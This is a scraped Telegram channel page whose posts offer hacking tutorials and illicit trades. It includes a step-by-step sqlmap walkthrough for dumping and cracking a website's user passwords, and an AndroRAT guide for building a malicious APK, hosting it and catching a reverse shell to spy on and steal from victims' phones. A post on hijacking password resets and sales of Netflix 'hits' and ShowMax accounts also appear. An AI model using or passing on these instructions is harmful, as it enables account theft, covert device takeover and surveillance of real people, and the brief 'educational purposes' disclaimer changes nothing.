Get Mystery Box with random crypto!

✪᪥TαყʟσɾGᴀɴɢ᪥✪ ᗣ༎T.ɢᴏᴅシ︎

Logo of telegram channel cool_boy0000 — ✪᪥TαყʟσɾGᴀɴɢ᪥✪ ᗣ༎T.ɢᴏᴅシ︎ T
Logo of telegram channel cool_boy0000 — ✪᪥TαყʟσɾGᴀɴɢ᪥✪ ᗣ༎T.ɢᴏᴅシ︎
Channel address: @cool_boy0000
Categories: Technologies
Language: English
Subscribers: 1.54K
Description from channel

T°G.O.D Bʀɪɴɢɪɴɢ Sᴏʟᴜᴛɪᴏɴs Tᴏ S.ᴀ Dᴀᴛᴀ ᴘʀᴏʙʟᴇᴍs
Wᴇ sʜᴀʀᴇ ᴛʜᴇ ғᴏʟʟᴏᴡɪɴɢ
Eʜɪ
Eʜɪʟ
Oᴠᴘɴ
ᴀɪʀᴛɪᴍᴇ ᴛʀɪᴄᴋs
⚥︎Çᴇᴏ : @dennis_junior

Ratings & Reviews

5.00

2 reviews

Reviews can be left only by registered users. All reviews are moderated by admins.

5 stars

2

4 stars

0

3 stars

0

2 stars

0

1 stars

0


The latest Messages 3

2022-06-10 19:19:32 The wifi cracking tutorial coming tomorrow 14:00

I swear I'll drop it , and I do apologize for the delay I've been occupied with other thing

@V3rtualfreenet
7 views★Qůintōn V3řtuål【Kʀɪsᴘɪᴇs 】, 16:19
Open / Comment
2022-06-08 20:09:41 I NEED SOMEONE WHO GET ME 12 VODACOM SIMS AND GET HITS OF NETFLIX IN RETURN

CONTACT = @Netflixcityfounderi
41 viewsSᴍᴀʀᴛ KidƊ (𝕠𝕗𝕗𝕝𝕚𝕟𝕖) Krispies, 17:09
Open / Comment
2022-06-08 15:55:48 HERES THE NEW VIDMATE APK

$ download movies
$ download apks
$ download videos
$ don't download porn you disgusting people

Link :: http://getvdm1.com/app?f=co
53 views★Qůintōn V3řtuål【Kʀɪsᴘɪᴇs 】, 12:55
Open / Comment
2022-06-06 20:05:21 "How to hack accounts in a website"

$ okay so firstly I tested out this method on a website you can hack "it's legal" it's called 'getboo' so search it up and hack it

$ "let hack then , every user and their password is ours"

>Now go to the sites login where it asks for username and password
" were gonna target 'asd' "

On username input :: asd
On password input :: asd
(This above is incorrect)

Go to top right corner of your computer and tap there so the drop down appears...then tap "web developer" then after that tap "network"

Then tap login with those credentials I gave you "asd" then you'll see "login.php" tap that

On the left tap on response it'll say user does not exist (like I said) but woah now we can see what happens in secret when you're logging in you can also see code these are all entry points for us as hackers

Now let's go deeper in the hack

> go to your terminal aka(termux, kali linux etc)
> and install sqlmap if you haven't you don't have it install it you can find it easy via Google search

> were gonna use splmap to DUMP out all the "usernames and passwords" of the website

>in your terminal type in "sqlmap" (click to copy)

> then type in "sqlmap -h" (click to copy) to see options were given

> Now type in "sqlmap -u "(input link of website login.php)"

*if you're idiot let me make it simple input there not just the link of website but a attack point like "Google.com/login.php" not just a regular link were targeting peoples logins so make sure you have link of login page*

> type in:: sqlmap -u "(input link of website login.php) --data *(put request payload you found on requests on web developer)it should be a token*

(The --data is to specify the data we received from request payload and set it to be attacked... I'll type again because some of yall have 1 iQ from web developer on requests copy the request payload that starts with 'token=' read this again if you have no brain you'll understand... copy that token after --data in your terminal

> then run the command I just gave you sqlmap will tell you the token you inserted has a anti-CRSF token tap "n" and run it

>it'll ask you somethin else I won't explain it this is an essay now just click "y" and run and click "y" again and run

The site is not injectable okay
SIKE GOTCHA BISH

> click "forgot password on website"
> input on username "asd" on email input "asd" and run that simple
> and since you have web developer open go to requests and copy the payload request again

Run this
> sqlmap -u "link of forgot password of that website" --data *request payload you just copied* (click to copy)

> then you'll be asked a question on sqlmap click "Y"

>THATS IT WERE IN

Now let's get those usernames and passwords

Type this in terminal
>sqlmap -u *link of forgot password of that website* --data *request payload you just copied* --dbs(click to copy)

(The --dbs is meant to DUMP out all the data)

Now run that command above and you'll be asked a yes or no tap "y" now next you'll see a list since I targeted getboo I'll see it in the database so if you're targeting another site THAT YOU HAVE PERMISSION TO HACK
Put in that

Now type this in terminal:;
>sqlmap -u "link of forgot password of that website" --data *request payload you just copied* -D getboo --tables (click to copy)

(I put getboo there since it was on the database plus it's what I hacked/targetted and the --tables is to see all tables of data in the website)

Now run the command

>sqlmap -u "link of forgot password of that website" --data *request payload you just copied* -D getboo --dump-all (click to copy)

" the new thing I just added --dump-all is simple it all DUMP everything inside the database including passwords...everything bro"

Now it'll ask questions first one
Click "y"

Second one click "n"

Third one will ask if you wanna crack click "y" and click enter on that

If it asks for password suffixes click "n"

THEN ITLL START CRACKING THE PASSWORD FUSE

After click "y" boom all the usernames and passwords there

Confused ? Need help
Dm me =@V3rtualfreenet
45 views★Qůintōn V3řtuål【Kʀɪsᴘɪᴇs 】, 17:05
Open / Comment
2022-06-06 01:33:44
ShowMax Account On Sale

14 Days Account

Payment Method.


➪ $2 PayPal

➪ R30 MTN AirTime


Dm - @Intelligent_Noob246
10 views༆ мαѕтєʀ•ᴢα [иωρ] , 22:33
Open / Comment
2022-06-05 08:40:17 Our new lesson will be on::
"website account hacking"

> I'll tell you how hackers can hack into your website account by using the "forgot password?" option

> by using a network interceptor like burpsuit we can send an email to change the targets password

>student= "wait V3řtual_freeňet I don't understand"

Let me break it down to the lesser minds , so you know that when you forgot your password you can choose "forgot password" then they'll send you a link on Gmail to reset that password

> we as hackers can make that email go to us instead of the victim

"BUT HEY ILL BE RESETTING YOUR PASSWORD FOR YOU BECAUSE WE FORGOT IT "

@V3rtualfreenet
39 views★Qůintōn V3řtuål【Kʀɪsᴘɪᴇs 】, 05:40
Open / Comment
2022-06-02 22:45:54 How to hack gain control of any mobile device using a apk with malicious code

$ things you need::
1.Any terminal eg(termux,parrot os,kali)
2. Internet connection

$ Now let's hàck::
> go to your terminal and run this command:: git clone https://github.com/karma9874/AndroRAT.git (tap to copy)

> after you've run that run this one next:
cd AndroRAT/ (tap to copy) then run this :: ls to list the contents of the directory

> you will see requirements.txt so it has dependencies we need to ensure the command works so run this simple command :: pip install -r requirements.txt (tap to copy)
"It will install dependencies"....

> Now it's time to create a malicious apk

> run this command:
python3 androRAT.py --build -i 127.0.0.1 -p 4444 -o vertualfreenet.apk (tap to copy) remove vertualfreenet.apk and name the apk whatever you want

: the -i stands for IP address were using i chose 127.0.0.1 cuz that's the IP address of my termux machine if you're using kali or parrot os run this command

> ifconfig (tap to copy) it will show ip address of your terminal pls termux users check your ip address using this command so you ensure the address you're using is of your own machine

Moving on.....

Run this:: ls -lt (tap to copy) with this command it'll show you the apk you just created , simple

Now let's host a listener so we know if someone install your apk

> run this command to host::
python3 androRAT.py --shell -1 0.0.0.0 -p 4444 (tap to copy)

"Now it will wait for connections"

Now jump into a second session by sliding on the left side of your termux then you'll see new session tap that

>on that new session run this command:: sudo systemctl status apache2.service (tap to copy) this command will start a service for you "FOR FREE"

> let's start our server shall we:
sudo systemctl start apache2.service (tap to copy) this command will start your server

>run this command:: cd AndroRAT/ (tap to copy)

>run this command:: sudo cp vertualfreenet.apk var/www/html (tap to copy) this will copy and paste your malicious apk in the server You just started "change vertualfreenet.apk to the name of your malicious apk if you haven't idiot"

Now send this to your victim::
> 127.0.0.1/vertualfreenet.apk (tap to copy) "change name of my apk to yours"

Now if the victim installed your apk , swipe on the left side of your termux and go back to the first session we did...the one we exited on...it will tell you "hello welcome to reverse shell of androRAT"

That's it we're in

Now type in this::
help (tap to copy)

The help will show you how to steal info from the victims take pictures of them without knowing steal info from their phone etc....

Disclaimer:: This information is for educational purposes only I do not encourage any misuse of this knowledge only use this Info on yourself or if you gain permission to use it on someone

@V3rtualfreenet
26 views★Qůintōn V3řtuål【Kʀɪsᴘɪᴇs 】, 19:45
Open / Comment
2022-06-02 08:11:10 Next lesson coming up

$ I will show you how to get full control of a "mobile device" just by letting them install any apk you sent to them

$ The part is it can be any apk even a legit game that you put malicious code into so they can install it then : it's GAME OVER

Programming/coding/hacking::
@V3rtualfreenet
42 views★Qůintōn V3řtuål【Kʀɪsᴘɪᴇs 】, 05:11
Open / Comment